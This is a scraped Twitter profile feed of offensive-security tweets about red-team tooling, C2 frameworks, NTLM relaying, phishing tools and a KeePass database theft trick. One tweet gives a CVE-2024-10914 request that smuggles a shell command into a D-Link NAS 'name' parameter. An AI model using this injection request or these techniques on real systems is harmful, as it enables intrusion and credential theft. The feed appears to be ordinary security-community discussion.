incursion (@incursi0n)'s Twitter Profile
incursion

@incursi0n

💩💩💩💩💩💩💩💩💩💩💩
github.com/incursi0n

ID: 1493617586608623618

15-02-2022 16:06:08

53 Tweet

7 Followers

110 Following

WHOAMI (@wh0amitz) 's Twitter Profile Photo

SharpADWS is an Active Directory Recon and Exploit tool for Red Teams via the ADWS protocol, inspired by @FalconForceTeam. Without the LDAP protocol, it can easily bypass most traffic monitoring for LDAP. #BloodHound #redteam #Pentesting #CyberSecurity github.com/wh0amitz/Sharp…

Cube0x0 (@cube0x0)

Over a year ago, I left my position at WithSecure to start a new journey, create something new, and do my own thing. Today, I'm excited to publicly announce what I've been working on all this time. Introducing 0xC2, a cross-platform C2 framework targeting Windows, Linux, and

Daniel Heinsen (@hotnops)

It's alive! Apeman is a graph-based tool to model AWS IAM permissions. This marks the start of a new journey to methodically identify and remediate IAM attack paths, and I look forward to learning together with y'all. github.com/hotnops/apeman

Merill Fernando (@merill)

Folks, the NIST National Cybersecurity Center of Excellence (NCCoE), Microsoft, and 24 other organizations have collaborated to provide you guidance on Zero Trust implementation, including labs from Microsoft for the Microsoft Security products and services. This is a treasure

TheSecMaster (@thesecmaster1)

☑️ TOP 10 PHISHING TOOLS TO USE IN 2024

Setoolkit - github.com/trustedsec/soc…
SocialFish - github.com/UndeadSec/Soci…
HiddenEye - github.com/DarkSecDevelop…
Evilginx2 - github.com/kgretzky/evilg…
SeeYou - (Get Location using phishing attack) - github.com/Viralmaniar/I-…
SayCheese -

0xor0ne (@0xor0ne)

Short intro to ARM exploitation for beginners by

1. blog.3or.de/arm-exploitati…
2. blog.3or.de/arm-exploitati…
3. blog.3or.de/arm-exploitati…
4. blog.3or.de/arm-exploitati…

Credits Dimitrios Slamaris

#arm #infosec

CodeX (@codex_tf2)

Decided to start a repo to collate the bits and pieces of small utils I write for oddly specific things over time while doing boxes/labs. Nothing fancy but maybe it'll save someone some time. Will be updated. github.com/CodeXTF2/codex…

OtterHacker (@otterhacker)

Several people asked me how I detect the hooks set by an EDR on my process. Here is the code. This is highly inspired by the EDRSandblast code by Maxime Meignan and Qazeer. This was one of the first projects I've done ☺️ Feel free to play with it! github.com/OtterHacker/Ho…

Cube0x0 (@cube0x0)

Don't we all get to the point where all you want to do is capture and relay NTLM and Kerberos authentications in a BOF? It's just faster to write a capture & relaying framework in C for ntlm, kerberos, dcom, smb, http, mssql with native Windows support than fixing impacket.

Diego Capriotti (@naksyn)

This has been one of my favorites for a while, but now it's time to let it go. Here's my preferred way of getting the KeePass db that we often hunt for: downgrade the executable to version 2.53, use CVE-2023-24055 and wait for the busy admin to trigger the dump of the database.

James Forshaw (@tiraniddo)

Put up the slides for my Microsoft BlueHat 2024 presentation on improvements to OleView.NET github.com/tyranid/infose… You can also grab v1.15 of OleView.NET from the PS Gallery which has the new features to generate proxy clients on the fly.

Clandestine (@akaclandestine)

cve-2024-10914 GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27 FOFA:app =D_Link-DNS-ShareCenter #exploit #poc #IoT

Swissky (@pentest_swissky)

Active Directory Certificate Services (AD CS) - A Beautifully Vulnerable and Mis-configurable Mess logan-goins.com/2024-05-04-ADC…

Binni Shah (@binitamshah)

Deepinstinct : DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely : github.com/deepinstinct/D… Ref : Forget PSEXEC: DCOM Upload & Execute Backdoor : deepinstinct.com/blog/forget-ps…

incursion (@incursi0n)

Made a BOF version of the PoC by Chris Au's ClipboardHistoryThief. This is an alternative to the built-in clipboard feature in Cobalt Strike that adds the capability to enable/disable and dump the clipboard history. github.com/incursi0n/Clip…